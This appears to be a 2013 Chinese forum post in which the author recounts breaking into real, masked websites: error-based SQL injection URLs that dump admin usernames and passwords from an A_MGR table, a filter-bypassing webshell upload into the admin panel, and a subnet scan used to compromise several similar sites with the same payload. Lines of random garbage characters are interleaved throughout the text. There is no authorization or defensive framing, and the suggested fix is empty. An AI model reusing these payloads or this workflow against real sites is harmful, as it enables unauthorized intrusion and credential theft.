发现一个注入点# j6 V& V9 v5 H& R: b6 o: V
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389* g0 x! P. x: w; y* q0 C. |" |
7 i+ \4 G7 l' }: p习惯性的加’having1=1--
: R# a) Z% S; \ L3 h% N) ~1 s2 e f
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—, `% T( q& Y& x7 D
- _0 I5 ^! \7 p; }0" P: k1 T2 C) B
/ f* ]; f* n% i爆出Diary_A.dl_Title(这时候很激动啊)
5 ?1 E% P5 ~. y$ n( V9 n! B' r
& Q+ e. \5 W# O, y% ]那么继续; C- u2 Y" T$ P6 ]8 [, R
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—) ]: c n' L7 [/ R0 Z" |
! I2 j; s% \; |* Q+ i+ O2 w
继续,一直爆下去/ R& n9 q- b8 @0 F$ i* v$ t9 [; U
4 h h/ R) e& d- W+ N. @1 |爆到几个字段和表段 但是没找到需要的管理用户的字段
; G4 Q2 \% a4 }, n' ~2 V
9 z. N( y, H* t6 c# \; v蛋疼了 怎么办 然后去后台登陆页看源码
) O; K* z! C$ s8 z; R+ O5 D
1 Z% O: V1 q9 [- C" q! q01 ]# ` o$ @' A3 O
0 } A1 j- E# ] V, f+ mInput name= “ADUID”* @' p& Q; F6 L: Q0 |1 Y
Input name= “ADPWD”
! C) D- s0 b' Y. I3 s/ @" ` s5 s9 _" g9 m: \. x7 k
很幸运 找到了字段那就继续# P. M# W/ u. W# I" ~
找到之后开始爆用户, @" j! x* p P. \
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
; K' x) x9 I( v- s% K1 L爆密码+ m# t: r' h. {
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
- d1 J5 F- z: e测试了下 这个注入点只能爆到文章哪里的表
( W! Q: I9 r, v7 I% i9 c% G+ V9 G" T' M+ |: o9 H6 L) w
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
( E/ Y1 s& |, O* E! h: E3 h" S/ S" U5 j) t
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
Q5 F% B7 u4 G& y: \. K9 q. U R% o$ d; x/ G R, q1 W
473
1 a5 c+ U, n8 r4 q! Y& u* n
6 P/ Q, I% f6 u7 {! D进后台7 T3 v2 }" b7 q$ J0 I
/ y( A5 r- ~) h/ \
; j( I& k) P' y( ^7 w1 p
发现几个上传点 有的地方不能上传 而且防止恶意代码* k$ I* n2 c( x' U
- k; ^1 q+ A& Q$ G
没办法 各种百度各种找大牛 找到一只好像可以突破的马' K) i. ?. i7 _- T
; N/ B, k2 A4 z9 r
; I8 H3 U$ Z5 o) E/ ^在系统管理那里直接上传 不过没有显示地址9 z$ J! D- q& Y2 W6 M6 i
' R- p, L& X3 ]7 O& W% E E* e
再上传一次 抓包 搞定OK
: D+ @: L0 V% o7 y& `- Y% a% i- H/ R* ~: [% e; u% b0 h. C [3 j
7 i5 _& o) V3 v* v7 |
5 Y1 {" F0 n0 n5 [9 }' r* y" P472/ I# l/ o% E& f b: Q
) d I( E7 o/ K2 U( y
晚上不行了 去睡觉。。。
7 a3 N a& u7 x3 \第二天刚起床 闲的没事做继续日站吧
5 M* a1 i: o* H- A% o
( B3 E3 \: Q" @2 p8 c找个站 就把这个站的旁c扫了下) q; u4 f0 {5 Y J) \/ S! |) g0 `# W
" {8 L6 c8 \9 c& g% `. ~+ g0 e3 _/ A& B发现c段也有一个购物站 ,然后还和这个站的模板差不多5 N9 r$ @2 X3 ]7 j; f1 D) e# q+ |
( n/ @7 a& D% t+ T2 z8 m+ r就找到会员登录口测试
1 Y/ e% T. `- ?6 B3 ]# ~1 x0 X9 N4 c5 u
'and (select top 1 MGR_UID from A_MGR)>0— o3 \# {: B2 j8 L* _) P
果断爆到了 这时候我很激动 通杀
1 r* g' X& h* G4 A1 @5 N$ C4 O4 v2 }1 d+ Z1 L8 q! Y+ O
再次翻c段
; C/ ` z, S# E( a; W2 o. k* w: b" G6 j5 t5 r$ _
翻出几个站 都成功拿下
6 I! m& o5 G) r( p. H, S
; \$ O( E4 ]' q. q3 ~7 N/ v
3 R# J* ~0 N) W) S1 ]
$ {0 U/ @* G. z$ B* e修复方案:" E# P: Q3 B, v+ e1 s
他们比我专业
2 G- b7 N3 s1 Z6 y i! p
% @4 |- [1 Q% O! @
* R0 m$ j. E9 m
! s! G! D" q* v' u |
发表于 2013-4-4 17:40:38
收藏
支持
反对